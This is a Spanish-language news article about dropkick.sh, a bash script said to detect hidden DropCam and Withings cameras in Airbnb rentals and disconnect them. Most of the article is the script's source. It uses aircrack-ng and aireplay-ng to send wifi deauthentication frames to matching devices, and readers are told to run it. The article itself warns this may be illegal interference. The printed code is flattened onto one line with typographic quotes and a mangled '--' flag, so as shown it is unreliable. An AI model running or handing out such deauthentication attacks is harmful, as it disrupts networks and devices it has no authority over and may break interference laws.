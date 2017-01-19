Imagen: Nest

Está expresamente prohibido por los estándares de Airbnb, pero no sería la primera vez que un anfitrión espía a sus huéspedes con cámaras ocultas, ya sea por desconfianza o con fines más morbosos. Y la creciente popularidad de las cámaras wifi no hace más que empeorar esta situación inquietante.



Advertisement

Un simple script que puedes copiar y pegar en el intérprete de comandos de tu PC podría sacarte de dudas. Este código creado por el desarrollador Julian Oliver encuentra y desactiva automáticamente las cámaras conectadas a la red wifi de tu Airbnb para asegurarte la privacidad que te corresponde. Solo tienes que descargar dropkick.sh y ejecutarlo en un sistema compatible.

#!/bin/bash # # DROPKICK.SH # # Detect and Disconnect the DropCam and Withings devices some people are using to # spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh: # # http://julianoliver.com/output/log_2014-05-30_20-52 # # This script was named by Adam Harvey (http://ahprojects.com), who also # encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi, # etc) and the aircrack-ng suite. I put ‘beep’ in there for a little audio # notification. Comment it out if you don’t need it. # # See also http://plugunplug.net, for a plug-and-play device that does this # based on OpenWrt. Code here: # # https://github.com/JulianOliver/CyborgUnplug # # Save as dropkick.sh, ‘chmod +x dropkick.sh’ and exec as follows: # # sudo ./dropkick.sh <WIRELESS NIC> <BSSID OF ACCESS POINT> shopt -s nocasematch # Set shell to ignore case shopt -s extglob # For non-interactive shell. readonly NIC=$1 # Your wireless NIC readonly BSSID=$2 # Network BSSID (AirBnB WiFi network) readonly MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk ‘{ print $5 }’) # MAC=$(ip link show “$NIC” | awk ‘/ether/ {print $2}’) # If ‘ifconfig’ not # present. readonly GGMAC=’@(30:8C:FB*|00:24:E4*)‘ # Match against DropCam and Withings readonly POLL=30 # Check every 30 seconds readonly LOG=/var/log/dropkick.log airmon-ng stop mon0 # Pull down any lingering monitor devices airmon-ng start $NIC # Start a monitor device while true; do for TARGET in $(arp-scan -I $NIC —localnet | grep -o -E \ ‘([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}’) do if [[ “$TARGET” == “$GGMAC” ]] then # Audio alert beep -f 1000 -l 500 -n 200 -r 2 echo “WiFi camera discovered: “$TARGET >> $LOG aireplay-ng -0 1 -a $BSSID -c $TARGET mon0 echo “De-authed: “$TARGET “ from network: “ $BSSID >> $LOG echo ‘ __ __ _ __ __ ___/ /______ ___ / /__ (_)___/ /_____ ___/ / / _ / __/ _ \/ _ \/ _// / __/ _/ -_) _ / \_,_/_/ \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/ /_/ ‘ else echo $TARGET”: is not a DropCam or Withings device. Leaving alone..” fi done echo “None found this round.” sleep $POLL done airmon-ng stop mon0

Pero ten en cuenta que ejecutar el script podría ser ilegal en países como Estados Unidos, donde la Comisión Federal de Comunicaciones clasifica la desactivación de clientes wifi como una interferencia intencionada. Claro que también suele ser ilegal que te graben sin avisarte. [Julian Oliver]